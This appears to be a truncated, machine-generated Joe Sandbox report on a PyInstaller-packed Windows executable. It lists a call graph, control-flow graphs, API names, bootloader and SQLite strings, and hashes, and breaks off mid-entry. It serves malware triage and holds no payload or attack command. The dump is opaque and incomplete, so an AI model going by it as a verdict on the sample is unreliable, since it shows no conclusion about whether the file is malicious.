7ff78da56095 21954->21784 21955 7ff78da561ab 21955->21784 21957 7ff78da52710 MessageBoxW MessageBoxA GetCurrentProcessId 21957->21958 21958->21955 21958->21957 21975 7ff78da51470 21958->21975 21960 7ff78da59400 21959->21960 21961 7ff78da59084 LoadLibraryExW 21960->21961 21962 7ff78da590a3 21961->21962 21962->21920 21963->21919 21964->21913 21965->21919 21966->21930 21967->21930 21968->21930 21969->21930 21970->21930 21971->21930 21972->21930 21973->21930 21974->21930 21976 7ff78da545b0 15 API calls 21975->21976 21977 7ff78da51493 21976->21977 21978 7ff78da5149b 21977->21978 21979 7ff78da514bc 21977->21979 22002 7ff78da52710 MessageBoxW MessageBoxA GetCurrentProcessId 21978->22002 21981 7ff78da60744 2 API calls 21979->21981 21983 7ff78da514d1 21981->21983 21982 7ff78da514ab 21982->21958 21984 7ff78da51538 21983->21984 21989 7ff78da5154b 21983->21989 21990 7ff78da514d5 21983->21990 21992 7ff78da51210 21984->21992 21986 7ff78da600bc 5 API calls 21987 7ff78da515c4 21986->21987 21987->21958 21988 7ff78da6040c _fread_nolock 19 API calls 21988->21989 21989->21988 21989->21990 21990->21986 21991->21954 21993 7ff78da51268 21992->21993 21994 7ff78da5126f 21993->21994 22001 7ff78da51297 _fread_nolock 21993->22001 22003 7ff78da52710 MessageBoxW MessageBoxA GetCurrentProcessId 21994->22003 21996 7ff78da51282 21996->21990 21997 7ff78da6040c _fread_nolock 19 API calls 21997->22001 21998 7ff78da512b1 21998->21990 21999 7ff78da513cf 22004 7ff78da52710 MessageBoxW MessageBoxA GetCurrentProcessId 21999->22004 22001->21997 22001->21998 22001->21999 22002->21982 22003->21996 22004->21998 22006 7ff78da65f38 22005->22006 22007 7ff78da65f5e 22006->22007 22010 7ff78da65f91 22006->22010 22008 7ff78da65f63 _invalid_parameter_noinfo 22007->22008 22009 7ff78da65f6e 22008->22009 22009->21788 22010->22009 22012 7ff78da6ff3c 22010->22012 22013 7ff78da6ff62 22012->22013 22015 7ff78da6ff96 22013->22015 22016 7ff78da76dc4 22013->22016 22015->22009 22019 7ff78da763c4 22016->22019 22018 7ff78da76df1 22018->22015 22020 7ff78da763f9 22019->22020 22021 7ff78da763db 22019->22021 22020->22021 22023 7ff78da76415 22020->22023 22022 7ff78da763e0 _invalid_parameter_noinfo 22021->22022 22025 7ff78da763ee 22022->22025 22026 7ff78da769d4 22023->22026 22025->22018 22044 7ff78da76708 22026->22044 22028 7ff78da76a1b 22029 7ff78da76a86 CreateFileW 22028->22029 22037 7ff78da76a49 _fread_nolock 22028->22037 22030 7ff78da76b6c GetFileType 22029->22030 22031 7ff78da76af1 22029->22031 22032 7ff78da76b79 GetLastError 22030->22032 22038 7ff78da76bca 22030->22038 22033 7ff78da76b39 GetLastError 22031->22033 22035 7ff78da76aff CreateFileW 22031->22035 22052 7ff78da64eec _fread_nolock 22032->22052 22033->22037 22035->22030 22035->22033 22036 7ff78da76b88 CloseHandle 22036->22037 22040 7ff78da76bba 22036->22040 22037->22025 22038->22037 22039 7ff78da76d0c CloseHandle CreateFileW 22038->22039 22039->22040 22041 7ff78da76d53 GetLastError 22039->22041 22040->22037 22042 7ff78da76d60 _fread_nolock 22041->22042 22053 7ff78da686d0 SetStdHandle 22042->22053 22045 7ff78da76734 22044->22045 22048 7ff78da76752 22044->22048 22046 7ff78da76743 _invalid_parameter_noinfo 22045->22046 22045->22048 22046->22048 22047 7ff78da767d0 22049 7ff78da76812 _invalid_parameter_noinfo 22047->22049 22051 7ff78da7681f 22047->22051 22048->22047 22050 7ff78da767c1 _invalid_parameter_noinfo 22048->22050 22049->22051 22050->22047 22051->22028 22052->22036 22053->22040 22055 7ff78da5feb3 22054->22055 22056 7ff78da5fee1 22054->22056 22055->21799 22056->22055 22058 7ff78da5ff14 22056->22058 22059 7ff78da5ff2f 22058->22059 22060 7ff78da5ff54 22058->22060 22059->22055 22060->22059 22064 7ff78da6aa6c 22060->22064 22062 7ff78da5ff83 22062->22059 22063 7ff78da6a9b8 _fread_nolock 2 API calls 22062->22063 22063->22059 22065 7ff78da6aa80 22064->22065 22066 7ff78da6aa98 22064->22066 22065->22062 22066->22065 22068 7ff78da6a9f4 22066->22068 22069 7ff78da6aa10 22068->22069 22071 7ff78da6aa45 22069->22071 22072 7ff78da6abc8 22069->22072 22071->22065 22073 7ff78da6abe4 22072->22073 22074 7ff78da6abea 22073->22074 22077 7ff78da6ac33 CloseHandle 22073->22077 22079 7ff78da686d0 SetStdHandle 22074->22079 22076 7ff78da6ac4f 22076->22071 22077->22074 22078 7ff78da6ac40 GetLastError 22077->22078 22078->22074 22079->22076 22177 7ff8a92e1884 22180 7ff8a92ee9f0 22177->22180 22178 7ff8a92eec5b 22179 7ff8a92e1497 SetLastError 22179->22180 22180->22178 22180->22179 22181 7ff78da65698 22182 7ff78da656cf 22181->22182 22185 7ff78da656b2 22181->22185 22183 7ff78da656e2 CreateFileW 22182->22183 22182->22185 22184 7ff78da65716 22183->22184 22189 7ff78da6574c _fread_nolock 22183->22189 22187 7ff78da6572b CloseHandle 22184->22187 22188 7ff78da65741 CloseHandle 22184->22188 22186 7ff78da656bf _invalid_parameter_noinfo 22185->22186 22186->22189 22187->22189 22188->22189 22080 7ff8a92f7e90 22081 7ff8a92e12ee 22080->22081 22082 7ff8a92f7eb0 SetLastError 22081->22082 22083 7ff8a92f7ed7 22082->22083 22190 7ff8a87ef490 GetSystemInfo 22191 7ff8a87ef4c4 22190->22191 22192 7ff8a87ffab0 22193 7ff8a87ffafc 22192->22193 22194 7ff8a87ffb0e 00007FF8C6125630 22193->22194 22195 7ff8a87ffb21 22193->22195 22194->22195 22198 7ff8a87ffc32 22195->22198 22200 7ff8a87f7450 22195->22200 22197 7ff8a87ffed7 22197->22198 22199 7ff8a87ebc90 2 API calls 22197->22199 22199->22198 22202 7ff8a87f74e1 22200->22202 22201 7ff8a87f7595 00007FF8BFAB19C0 22203 7ff8a87f75fb 22201->22203 22202->22201 22204 7ff8a87f7763 22202->22204 22203->22204 22206 7ff8a87ee270 22203->22206 22204->22197 22210 7ff8a87ee2be 22206->22210 22207 7ff8a87ee490 CreateFileW 22207->22210 22208 7ff8a87ee645 22208->22204 22209 7ff8a87eeac0 GetFileAttributesExW 22209->22210 22210->22207 22210->22208 22210->22209 22084 7ff8a8834b90 22085 7ff8a8834bde 22084->22085 22086 7ff8a8834ebf 22085->22086 22088 7ff8a883bc30 22085->22088 22089 7ff8a883bc5c 22088->22089 22091 7ff8a883bc61 22088->22091 22092 7ff8a885eba0 22089->22092 22091->22085 22093 7ff8a885ebb9 22092->22093 22095 7ff8a885ebc5 22092->22095 22096 7ff8a885ead0 22093->22096 22095->22091 22097 7ff8a885eb0a 22096->22097 22099 7ff8a885eb17 22096->22099 22102 7ff8a885e640 22097->22102 22100 7ff8a885eb6d 22099->22100 22101 7ff8a885e640 8 API calls 22099->22101 22100->22095 22101->22099 22109 7ff8a885e360 22102->22109 22104 7ff8a885e6fc 22106 7ff8a885e723 22104->22106 22107 7ff8a885e76d 22104->22107 22113 7ff8a88010a0 22104->22113 22106->22099 22107->22106 22117 7ff8a88579d0 22107->22117 22110 7ff8a885e386 22109->22110 22112 7ff8a885e38f 22109->22112 22110->22112 22123 7ff8a885eec0 00007FF8BFAB19C0 22110->22123 22112->22104 22115 7ff8a88010d7 22113->22115 22116 7ff8a8801139 22115->22116 22127 7ff8a8800c80 22115->22127 22116->22107 22120 7ff8a88579fd 22117->22120 22121 7ff8a8857a06 22117->22121 22120->22106 22121->22120 22122 7ff8a885e360 8 API calls 22121->22122 22169 7ff8a885f430 22121->22169 22173 7ff8a8815590 22121->22173 22122->22121 22126 7ff8a885ef93 22123->22126 22124 7ff8a885f073 22124->22112 22125 7ff8a88010a0 7 API calls 22125->22126 22126->22124 22126->22125 22132 7ff8a87f7e90 22127->22132 22129 7ff8a8800c91 22130 7ff8a8800cb1 22129->22130 22138 7ff8a87f8270 22129->22138 22130->22115 22134 7ff8a87f7ec0 22132->22134 22135 7ff8a87f7f1d 22132->22135 22133 7ff8a87f80bf 22133->22135 22155 7ff8a87eeac0 22133->22155 22134->22133 22134->22135 22149 7ff8a87ebc90 22134->22149 22135->22129 22139 7ff8a87f82c5 22138->22139 22140 7ff8a87f8292 22138->22140 22159 7ff8a87f32f0 22139->22159 22140->22130 22141 7ff8a87f8433 22163 7ff8a87f6010 22141->22163 22142 7ff8a87f84bd 00007FF8BFAB19C0 22142->22140 22144 7ff8a87f82e9 22144->22140 22144->22141 22145 7ff8a87f844d 22144->22145 22145->22140 22145->22142 22167 7ff8a87f4b20 00007FF8BFAB19C0 00007FF8BFAB19C0 22145->22167 22147 7ff8a87f84af 22147->22142 22151 7ff8a87ebcbd 22149->22151 22150 7ff8a87ebd34 ReadFile 22150->22151 22152 7ff8a87ebdca 22150->22152 22151->22150 22151->22152 22154 7ff8a87ebcd4 22151->22154 22153 7ff8a87ebe09 00007FF8BFAB19C0 22152->22153 22152->22154 22153->22154 22154->22133 22158 7ff8a87eeaec 22155->22158 22156 7ff8a87eeb40 GetFileAttributesExW 22157 7ff8a87eeaf4 22156->22157 22156->22158 22157->22135 22158->22156 22158->22157 22162 7ff8a87f3347 22159->22162 22160 7ff8a87f336e 22160->22144 22162->22160 22168 7ff8a87f2c40 00007FF8BFAB19C0 22162->22168 22164 7ff8a87f603f 22163->22164 22165 7ff8a87f605c 22164->22165 22166 7ff8a87ebc90 2 API calls 22164->22166 22165->22140 22166->22165 22167->22147 22168->22160 22170 7ff8a885f460 22169->22170 22172 7ff8a885f4b3 22169->22172 22170->22121 22171 7ff8a885eec0 8 API calls 22171->22172 22172->22170 22172->22171 22175 7ff8a88155ab 22173->22175 22176 7ff8a88155bc 22173->22176 22174 7ff8a885f430 8 API calls 22174->22176 22175->22121 22176->22174 22176->22175 22211 7ff8a883d140 22212 7ff8a883d186 22211->22212 22213 7ff8a885eba0 8 API calls 22212->22213 22214 7ff8a883d350 22212->22214 22218 7ff8a883d20e 22212->22218 22213->22214 22216 7ff8a883d49e 22214->22216 22214->22218 22219 7ff8a880e960 22214->22219 22217 7ff8a880e960 00007FF8BFAB19C0 22216->22217 22216->22218 22217->22218 22222 7ff8a880e983 22219->22222 22220 7ff8a880ea61 22220->22216 22221 7ff8a880e9c2 00007FF8BFAB19C0 22223 7ff8a880e9e7 22221->22223 22222->22220 22222->22221 22223->22216 22224 7ff78da6c084 22225 7ff78da6c0db 22224->22225 22226 7ff78da6c0ad 22224->22226 22225->22226 22227 7ff78da6c1a4 _fread_nolock 2 API calls 22225->22227 22227->22226 22228 7ff78da52fe0 22229 7ff78da52ff0 22228->22229 22230 7ff78da5302b 22229->22230 22231 7ff78da53041 22229->22231 22244 7ff78da52710 MessageBoxW MessageBoxA GetCurrentProcessId 22230->22244 22233 7ff78da53061 22231->22233 22240 7ff78da53077 22231->22240 22245 7ff78da52710 MessageBoxW MessageBoxA GetCurrentProcessId 22233->22245 22235 7ff78da51470 39 API calls 22235->22240 22236 7ff78da53349 22248 7ff78da52710 MessageBoxW MessageBoxA GetCurrentProcessId 22236->22248 22238 7ff78da53333 22247 7ff78da52710 MessageBoxW MessageBoxA GetCurrentProcessId 22238->22247 22240->22235 22240->22236 22240->22238 22241 7ff78da5330d 22240->22241 22243 7ff78da53037 22240->22243 22246 7ff78da52710 MessageBoxW MessageBoxA GetCurrentProcessId 22241->22246 22244->22243 22245->22243 22246->22243 22247->22243 22248->22243 22249 7ff8a881a864 22250 7ff8a8819d75 22249->22250 22250->22249 22251 7ff8a88010a0 7 API calls 22250->22251 22252 7ff8a881a996 22250->22252 22251->22250

                                                                                                                                                                                                                                        Executed Functions

                                                                                                                                                                                                                                        Function 00007FF78DA51000 Relevance: 61.8, APIs: 7, Strings: 28, Instructions: 509COMMON
                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                        control_flow_graph 0 7ff78da51000-7ff78da53806 call 7ff78da5fe88 call 7ff78da5fe90 call 7ff78da5c8c0 call 7ff78da65460 call 7ff78da654f4 call 7ff78da536b0 14 7ff78da53808-7ff78da5380f 0->14 15 7ff78da53814-7ff78da53836 call 7ff78da51950 0->15 16 7ff78da53c97-7ff78da53cb2 call 7ff78da5c5c0 14->16 20 7ff78da5391b-7ff78da53931 call 7ff78da545b0 15->20 21 7ff78da5383c-7ff78da53856 call 7ff78da51c80 15->21 28 7ff78da5396a-7ff78da5397f call 7ff78da52710 20->28 29 7ff78da53933-7ff78da53960 call 7ff78da57f80 20->29 25 7ff78da5385b-7ff78da5389b call 7ff78da58a20 21->25 34 7ff78da5389d-7ff78da538a3 25->34 35 7ff78da538c1-7ff78da538cc call 7ff78da64fa0 25->35 39 7ff78da53c8f 28->39 37 7ff78da53984-7ff78da539a6 call 7ff78da51c80 29->37 38 7ff78da53962-7ff78da53965 call 7ff78da600bc 29->38 40 7ff78da538a5-7ff78da538ad 34->40 41 7ff78da538af-7ff78da538bd call 7ff78da58b90 34->41 47 7ff78da539fc-7ff78da53a2a call 7ff78da58b30 call 7ff78da58b90 * 3 35->47 48 7ff78da538d2-7ff78da538e1 call 7ff78da58a20 35->48 53 7ff78da539b0-7ff78da539b9 37->53 38->28 39->16 40->41 41->35 76 7ff78da53a2f-7ff78da53a3e call 7ff78da58a20 47->76 57 7ff78da538e7-7ff78da538ed 48->57 58 7ff78da539f4-7ff78da539f7 call 7ff78da64fa0 48->58 53->53 56 7ff78da539bb-7ff78da539d8 call 7ff78da51950 53->56 56->25 68 7ff78da539de-7ff78da539ef call 7ff78da52710 56->68 62 7ff78da538f0-7ff78da538fc 57->62 58->47 65 7ff78da538fe-7ff78da53903 62->65 66 7ff78da53905-7ff78da53908 62->66 65->62 65->66 66->58 69 7ff78da5390e-7ff78da53916 call 7ff78da64fa0 66->69 68->39 69->76 79 7ff78da53a44-7ff78da53a47 76->79 80 7ff78da53b45-7ff78da53b53 76->80 79->80 83 7ff78da53a4d-7ff78da53a50 79->83 81 7ff78da53a67 80->81 82 7ff78da53b59-7ff78da53b5d 80->82 84 7ff78da53a6b-7ff78da53a90 call 7ff78da64fa0 81->84 82->84 85 7ff78da53b14-7ff78da53b17 83->85 86 7ff78da53a56-7ff78da53a5a 83->86 95 7ff78da53aab-7ff78da53ac0 84->95 96 7ff78da53a92-7ff78da53aa6 call 7ff78da58b30 84->96 87 7ff78da53b19-7ff78da53b1d 85->87 88 7ff78da53b2f-7ff78da53b40 call 7ff78da52710 85->88 86->85 90 7ff78da53a60 86->90 87->88 91 7ff78da53b1f-7ff78da53b2a 87->91 97 7ff78da53c7f-7ff78da53c87 88->97 90->81 91->84 99 7ff78da53be8-7ff78da53bfa call 7ff78da58a20 95->99 100 7ff78da53ac6-7ff78da53aca 95->100 96->95 97->39 108 7ff78da53bfc-7ff78da53c02 99->108 109 7ff78da53c2e 99->109 102 7ff78da53bcd-7ff78da53be2 call 7ff78da51940 100->102 103 7ff78da53ad0-7ff78da53ae8 call 7ff78da652c0 100->103 102->99 102->100 113 7ff78da53aea-7ff78da53b02 call 7ff78da652c0 103->113 114 7ff78da53b62-7ff78da53b7a call 7ff78da652c0 103->114 111 7ff78da53c1e-7ff78da53c2c 108->111 112 7ff78da53c04-7ff78da53c1c 108->112 115 7ff78da53c31-7ff78da53c40 call 7ff78da64fa0 109->115 111->115 112->115 113->102 126 7ff78da53b08-7ff78da53b0f 113->126 124 7ff78da53b7c-7ff78da53b80 114->124 125 7ff78da53b87-7ff78da53b9f call 7ff78da652c0 114->125 122 7ff78da53c46-7ff78da53c4a 115->122 123 7ff78da53d41-7ff78da53d63 call 7ff78da544d0 115->123 127 7ff78da53cd4-7ff78da53ce6 call 7ff78da58a20 122->127 128 7ff78da53c50-7ff78da53c5f call 7ff78da590e0 122->128 137 7ff78da53d65-7ff78da53d6f call 7ff78da54620 123->137 138 7ff78da53d71-7ff78da53d82 call 7ff78da51c80 123->138 124->125 139 7ff78da53bac-7ff78da53bc4 call 7ff78da652c0 125->139 140 7ff78da53ba1-7ff78da53ba5 125->140 126->102 144 7ff78da53ce8-7ff78da53ceb 127->144 145 7ff78da53d35-7ff78da53d3c 127->145 142 7ff78da53cb3-7ff78da53cbd call 7ff78da58850 128->142 143 7ff78da53c61 128->143 152 7ff78da53d87-7ff78da53d96 137->152 138->152 139->102 154 7ff78da53bc6 139->154 140->139 160 7ff78da53cc8-7ff78da53ccf 142->160 161 7ff78da53cbf-7ff78da53cc6 142->161 149 7ff78da53c68 call 7ff78da52710 143->149 144->145 150 7ff78da53ced-7ff78da53d10 call 7ff78da51c80 144->150 145->149 162 7ff78da53c6d-7ff78da53c77 149->162 167 7ff78da53d2b-7ff78da53d33 call 7ff78da64fa0 150->167 168 7ff78da53d12-7ff78da53d26 call 7ff78da52710 call 7ff78da64fa0 150->168 157 7ff78da53d98-7ff78da53d9f 152->157 158 7ff78da53dc4-7ff78da53dda call 7ff78da59400 152->158 154->102 157->158 164 7ff78da53da1-7ff78da53da5 157->164 170 7ff78da53ddc 158->170 171 7ff78da53de8-7ff78da53e04 SetDllDirectoryW 158->171 160->152 161->149 162->97 164->158 169 7ff78da53da7-7ff78da53dbe SetDllDirectoryW LoadLibraryExW 164->169 167->152 168->162 169->158 170->171 175 7ff78da53e0a-7ff78da53e19 call 7ff78da58a20 171->175 176 7ff78da53f01-7ff78da53f08 171->176 189 7ff78da53e1b-7ff78da53e21 175->189 190 7ff78da53e32-7ff78da53e3c call 7ff78da64fa0 175->190 180 7ff78da53ffc-7ff78da54004 176->180 181 7ff78da53f0e-7ff78da53f15 176->181 183 7ff78da54029-7ff78da54034 call 7ff78da536a0 call 7ff78da53360 180->183 184 7ff78da54006-7ff78da54023 PostMessageW GetMessageW 180->184 181->180 182 7ff78da53f1b-7ff78da53f25 call 7ff78da533c0 181->182 182->162 196 7ff78da53f2b-7ff78da53f3f call 7ff78da590c0 182->196 200 7ff78da54039-7ff78da5405b call 7ff78da53670 call 7ff78da56fb0 call 7ff78da56d60 183->200 184->183 193 7ff78da53e2d-7ff78da53e2f 189->193 194 7ff78da53e23-7ff78da53e2b 189->194 201 7ff78da53ef2-7ff78da53efc call 7ff78da58b30 190->201 202 7ff78da53e42-7ff78da53e48 190->202 193->190 194->193 207 7ff78da53f64-7ff78da53fa7 call 7ff78da58b30 call 7ff78da58bd0 call 7ff78da56fb0 call 7ff78da56d60 call 7ff78da58ad0 196->207 208 7ff78da53f41-7ff78da53f5e PostMessageW GetMessageW 196->208 201->176 202->201 206 7ff78da53e4e-7ff78da53e54 202->206 210 7ff78da53e56-7ff78da53e58 206->210 211 7ff78da53e5f-7ff78da53e61 206->211 248 7ff78da53fe9-7ff78da53ff7 call 7ff78da51900 207->248 249 7ff78da53fa9-7ff78da53fb3 call 7ff78da59200 207->249 208->207 212 7ff78da53e67-7ff78da53e83 call 7ff78da56db0 call 7ff78da57330 210->212 213 7ff78da53e5a 210->213 211->176 211->212 227 7ff78da53e8e-7ff78da53e95 212->227 228 7ff78da53e85-7ff78da53e8c 212->228 213->176 231 7ff78da53e97-7ff78da53ea4 call 7ff78da56df0 227->231 232 7ff78da53eaf-7ff78da53eb9 call 7ff78da571a0 227->232 230 7ff78da53edb-7ff78da53ef0 call 7ff78da52a50 call 7ff78da56fb0 call 7ff78da56d60 228->230 230->176 231->232 246 7ff78da53ea6-7ff78da53ead 231->246 242 7ff78da53ebb-7ff78da53ec2 232->242 243 7ff78da53ec4-7ff78da53ed2 call 7ff78da574e0 232->243 242->230 243->176 255 7ff78da53ed4 243->255 246->230 248->162 249->248 259 7ff78da53fb5-7ff78da53fca 249->259 255->230 260 7ff78da53fcc-7ff78da53fdf call 7ff78da52710 call 7ff78da51900 259->260 261 7ff78da53fe4 call 7ff78da52a50 259->261 260->162 261->248
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2405628550.00007FF78DA51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF78DA50000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2405593695.00007FF78DA50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2405669268.00007FF78DA7B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2405704192.00007FF78DA8E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2405704192.00007FF78DA91000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2405770842.00007FF78DA94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_7ff78da50000_9g9LZNE4bH.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: ErrorFileLastModuleName
                                                                                                                                                                                                                                        • String ID: Could not create temporary directory!$Could not load PyInstaller's embedded PKG archive from the executable (%s)$Could not side-load PyInstaller's PKG archive from external file (%s)$Failed to convert DLL search path!$Failed to initialize security descriptor for temporary directory!$Failed to load Tcl/Tk shared libraries for splash screen!$Failed to load splash screen resources!$Failed to remove temporary directory: %s$Failed to start splash screen!$Failed to unpack splash screen dependencies from PKG archive!$Invalid value in _PYI_PARENT_PROCESS_LEVEL: %s$MEI$PYINSTALLER_RESET_ENVIRONMENT$PYINSTALLER_STRICT_UNPACK_MODE$PYINSTALLER_SUPPRESS_SPLASH_SCREEN$Path exceeds PYI_PATH_MAX limit.$Py_GIL_DISABLED$VCRUNTIME140.dll$_PYI_APPLICATION_HOME_DIR$_PYI_APPLICATION_HOME_DIR not set for onefile child process!$_PYI_ARCHIVE_FILE$_PYI_PARENT_PROCESS_LEVEL$_PYI_SPLASH_IPC$bye-runtime-tmpdir$pkg$pyi-contents-directory$pyi-disable-windowed-traceback$pyi-python-flag
                                                                                                                                                                                                                                        • API String ID: 2776309574-3273434969
                                                                                                                                                                                                                                        • Opcode ID: c4287787c746abb56e9331fa3c8956d7c4ae80ab217cba986f551fa52fb8bac5
                                                                                                                                                                                                                                        • Instruction ID: 1a132817db7def829fbb78c57e271a0e3ee696cf273a2a4c8b821708b2050aec
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: c4287787c746abb56e9331fa3c8956d7c4ae80ab217cba986f551fa52fb8bac5
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: C2329F25A0C68291EA15BBA19454ABDE3B1BF85740FF44431DA5D832D2FF2CED5CC322
                                                                                                                                                                                                                                        Function 00007FF78DA769D4 Relevance: 13.8, APIs: 9, Instructions: 276fileCOMMON
                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                        control_flow_graph 465 7ff78da769d4-7ff78da76a47 call 7ff78da76708 468 7ff78da76a49-7ff78da76a52 call 7ff78da64f58 465->468 469 7ff78da76a61-7ff78da76a6b call 7ff78da68590 465->469 476 7ff78da76a55-7ff78da76a5c call 7ff78da64f78 468->476 474 7ff78da76a6d-7ff78da76a84 call 7ff78da64f58 call 7ff78da64f78 469->474 475 7ff78da76a86-7ff78da76aef CreateFileW 469->475 474->476 478 7ff78da76b6c-7ff78da76b77 GetFileType 475->478 479 7ff78da76af1-7ff78da76af7 475->479 487 7ff78da76da2-7ff78da76dc2 476->487 482 7ff78da76b79-7ff78da76bb4 GetLastError call 7ff78da64eec CloseHandle 478->482 483 7ff78da76bca-7ff78da76bd1 478->483 485 7ff78da76b39-7ff78da76b67 GetLastError call 7ff78da64eec 479->485 486 7ff78da76af9-7ff78da76afd 479->486 482->476 499 7ff78da76bba-7ff78da76bc5 call 7ff78da64f78 482->499 490 7ff78da76bd9-7ff78da76bdc 483->490 491 7ff78da76bd3-7ff78da76bd7 483->491 485->476 486->485 492 7ff78da76aff-7ff78da76b37 CreateFileW 486->492 496 7ff78da76be2-7ff78da76c37 call 7ff78da684a8 490->496 497 7ff78da76bde 490->497 491->496 492->478 492->485 504 7ff78da76c39-7ff78da76c45 call 7ff78da76910 496->504 505 7ff78da76c56-7ff78da76c87 call 7ff78da76488 496->505 497->496 499->476 504->505 510 7ff78da76c47 504->510 511 7ff78da76c8d-7ff78da76ccf 505->511 512 7ff78da76c89-7ff78da76c8b 505->512 513 7ff78da76c49-7ff78da76c51 call 7ff78da6ab30 510->513 514 7ff78da76cf1-7ff78da76cfc 511->514 515 7ff78da76cd1-7ff78da76cd5 511->515 512->513 513->487 518 7ff78da76d02-7ff78da76d06 514->518 519 7ff78da76da0 514->519 515->514 517 7ff78da76cd7-7ff78da76cec 515->517 517->514 518->519 521 7ff78da76d0c-7ff78da76d51 CloseHandle CreateFileW 518->521 519->487 522 7ff78da76d86-7ff78da76d9b 521->522 523 7ff78da76d53-7ff78da76d81 GetLastError call 7ff78da64eec call 7ff78da686d0 521->523 522->519 523->522
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2405628550.00007FF78DA51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF78DA50000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2405593695.00007FF78DA50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2405669268.00007FF78DA7B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2405704192.00007FF78DA8E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2405704192.00007FF78DA91000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2405770842.00007FF78DA94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_7ff78da50000_9g9LZNE4bH.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: File$CreateErrorLast_invalid_parameter_noinfo$CloseHandle$Type
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 1617910340-0
                                                                                                                                                                                                                                        • Opcode ID: 4205a6958293653b93a25a06bf68436f7b6b11ca03fe036e6858b65a4e3d069e
                                                                                                                                                                                                                                        • Instruction ID: 86c50e141fdaaecc99c5f8c7d154407f4b13856111a501c7bea3cad232770921
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 4205a6958293653b93a25a06bf68436f7b6b11ca03fe036e6858b65a4e3d069e
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: F9C10032B28A4185EB50EFA4D480AAC7765FB49B98FA40235DE6E577D4EF38D819C310
                                                                                                                                                                                                                                        Function 00007FF8A885EEC0 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 358COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2407338183.00007FF8A87E1000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00007FF8A87E0000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2407299776.00007FF8A87E0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2407338183.00007FF8A8932000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2407338183.00007FF8A8934000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2407338183.00007FF8A8949000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2407603885.00007FF8A894B000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2407635609.00007FF8A894C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_7ff8a87e0000_9g9LZNE4bH.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: 00007
                                                                                                                                                                                                                                        • String ID: database schema is locked: %s$out of memory$statement too long
                                                                                                                                                                                                                                        • API String ID: 3568877910-1046679716
                                                                                                                                                                                                                                        • Opcode ID: 3b5cb617efb2b80c3c8dfa67a96b6c2f85bc2abe2ff2955210009790a5627e4f
                                                                                                                                                                                                                                        • Instruction ID: 6cf8b64ca72e028d89caffc0aa9be4a018f7bcd8ca3e4f41fa2eba5b381df87d
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 3b5cb617efb2b80c3c8dfa67a96b6c2f85bc2abe2ff2955210009790a5627e4f
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 7CF18122B0A682A6FB29DB21D4043BE67A1FF45BC4F085175DA4D47795DF7CE481C324
                                                                                                                                                                                                                                        Function 00007FF8A87FFAB0 Relevance: 4.1, APIs: 1, Strings: 1, Instructions: 590COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
